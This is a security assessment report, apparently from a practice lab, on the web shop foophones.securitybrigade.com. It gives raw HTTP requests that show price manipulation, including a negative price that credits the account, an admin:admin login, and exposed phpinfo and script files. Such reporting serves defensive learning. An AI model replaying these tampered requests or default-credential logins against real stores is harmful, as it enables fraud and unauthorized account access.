REPORT ON foophones.securitybrigade.com

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 8

REPORT ON http://foophones.securitybrigade.

com/

1. Business Logic Error on


http://foophones.securitybrigade.com/buy.php?
id=1

POST /buy_confirm.php HTTP/1.1


Host: foophones.securitybrigade.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0)
Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://foophones.securitybrigade.com/buy.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://foophones.securitybrigade.com
Connection: keep-alive
Cookie:
_ga_F9S14CEDSY=GS1.1.1736429727.3.0.1736429727.60.0.1836213881;
_ga=GA1.1.469103268.1736417311; _gcl_au=1.1.1757196073.1736417311;
PHPSESSID=aut1fi6rjm67aqj3ch1u964do0
Upgrade-Insecure-Requests: 1
Priority: u=0, i

shipping=&price=29&id=1

: here in price parameter change price to anything like form 29 to


9 and the changed price i.e 9 will be deducted from our account
As you can see in the picture we get $99 as a credit on new
account registration and I purchase a phone by price
manipulation for $1 only
2. Business Logic Error on
http://foophones.securitybrigade.com/buy.php?
id=1

POST /buy_confirm.php HTTP/1.1


Host: foophones.securitybrigade.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0)
Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://foophones.securitybrigade.com/buy.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://foophones.securitybrigade.com
Connection: keep-alive
Cookie:
_ga_F9S14CEDSY=GS1.1.1736429727.3.0.1736429727.60.0.1836213881;
_ga=GA1.1.469103268.1736417311; _gcl_au=1.1.1757196073.1736417311;
PHPSESSID=aut1fi6rjm67aqj3ch1u964do0
Upgrade-Insecure-Requests: 1
Priority: u=0, i

shipping=&price=29&id=1

: here change price to -ve i.e from 29 to -29 and the


amount which has to deduct for our account will be
credited in our account
As you can see in the picture our balance was $98 in the previous
screenshot as I again buy a phone for $29 as the amount that
should deduct for our account is credit by just giving a (-)ve
amount
3. Weak Credentials on
http://foophones.securitybrigade.com/login.php

POST /login.php HTTP/1.1


Host: foophones.securitybrigade.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0)
Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://foophones.securitybrigade.com/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Origin: http://foophones.securitybrigade.com
Connection: keep-alive
Cookie: _ga_F9S14CEDSY=GS1.1.1736429727.3.0.1736429727.60.0.1836213881;
_ga=GA1.1.469103268.1736417311; _gcl_au=1.1.1757196073.1736417311;
PHPSESSID=aut1fi6rjm67aqj3ch1u964do0
Upgrade-Insecure-Requests: 1
Priority: u=0, i

user=admin&pass=admin
: here user and pass parameter is admin:admin

As we can see in the picture we have login by admin:admin credentials


4. Sensitive File disclosure on
http://foophones.securitybrigade.com/phpinfo.php
And http://foophones.securitybrigade.com/scripts/

You might also like